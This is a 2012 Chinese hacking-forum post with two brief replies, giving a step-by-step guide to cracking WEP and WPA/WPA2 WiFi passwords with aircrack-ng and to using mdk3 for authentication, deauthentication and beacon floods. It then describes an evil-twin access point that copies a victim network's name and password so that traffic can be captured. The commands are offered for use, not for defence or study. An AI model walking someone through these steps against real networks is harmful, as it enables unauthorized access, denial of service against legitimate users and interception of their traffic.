找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5212|回复: 2
打印 上一主题 下一主题

伪造AP获取WiFi密码

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-22 14:00:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
00×00 前因

现今社会,无线网络越渐发达,可是无论是企业还是自用wifi热点,对其安全性都并不是很重视,

另外一些恶意人员和商业间谍也在利用wifi进行恶意的攻击及资料窃取.

无线网络对于局域网来说是一个突破点,提到D.O.S,可能有人会说,

这是最流氓的一种攻击方式,但是我想说,这也是恶意攻击中最有效的一种方法.

工欲善其事必先利其器,为了达到目的,我们需要突破wifi的密码.

这次,我们先来总结下Linux下aircreak-ng系列获取密码的方法.长话短说,按步骤进行,都可以拿到你想要的!



00×01 介绍

不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别

iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0网卡
airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0

WEP
airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据量
aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了

WPA/WPA2
airodump-ng –c频道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake 提示获取成功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心

其实说到这里,hash破解速录会大大提升,只是利用字典制作hash table的时候需要花好长的时间,但是破解是aircrack的几十倍.

常见的几种DOS攻击:

Authentication Flood、Deauthentication Flood、Disassociation Flood、RF Jamming、Association Flood等



00×02 利用工具

本次我们还是依赖于BT5下一款强大的工具,mdk3

现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了.

针对路由器,我们可以发动Authentication Flood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击,

又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,

AP就会自动断开现有链接,使合法用户无法使用无线网络

mdk3 mon0 a –a AP的MAC地址(BSSID)




可以看到发动的同时,有大量虚假的客户端对AP进行连接,这些client

MAC地址也都是随机伪造的


此时我们可以通过-c来对指定的频道进行攻击,-a固定bssid进行攻击,-s控制发包速率.一般默认的是200个包/秒,

这样我们持续的攻击下去,无线网络在几分钟之内就会瘫痪,但是问题是,如果我们遇到一个能承载大量用户的AP客户端,那么我们该怎么办呢?

别急,下面我们就来使用当初我们获得handshake时候使用过的Deauthentication Flood,

记得么,当初我们使用aireplay-ng-0来发动使其断线来获取握手包,其实aireplay-ng即可发动,只要不控制发包数量,并随机频道即可,但是相比mdk3效率并不高.

这种攻击不是针对AP的,而是针对于client MAC.

mdk3 mon0 d



攻击开始了


可以看到,我的网络瞬间断断续续,当我停止后,网络恢复



此时我们可以利用-s参数来加快发包速率.这种效率是非常高的,一般发动开始,client便开始断网.

另外我们可以使用-w(白名单) –b(黑名单)来添加我们的mac地址,这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响,


而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里.

伪造AP


首先我们需要一块支持AP的无线网卡,或者直接上无线路由器,或者做热点,做ap方法网上很多很多,

这个大家可以自己找下.




为了识别一个是假的,所以我没有去修改mac地址


可以看到,上面的无线网络是我自己用无线网卡制作的伪造AP,其名称,密码,加密方式,工作频道,工作模式与原AP完全一样,

原AP被攻击无法链接,我只能连接这个,在不知情的情况下,会以为原AP是伪造的,因为无法链接.

这个时候我们就可以来抓我们自己AP网卡的数据包了.之后就是分析数据包.

另外,我们还可以发动虚假AP信号进行干扰
mdk3 mon0 b –g –c 11 –h 7



这个时候,我们就已经开始了对频道为11的AP进行大量干扰. 另外我们也可以对指定的网络发动
mdk3 mon0 b –n ESSID –g –c

对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道 其他的D.O.S大家可以自己研究研究

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-2-19 09:39:25 | 只看该作者
很好,看来后继有人
回复 支持 反对

使用道具 举报

板凳
发表于 2013-4-1 19:01:57 来自手机 | 只看该作者
恩  还不   不错
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表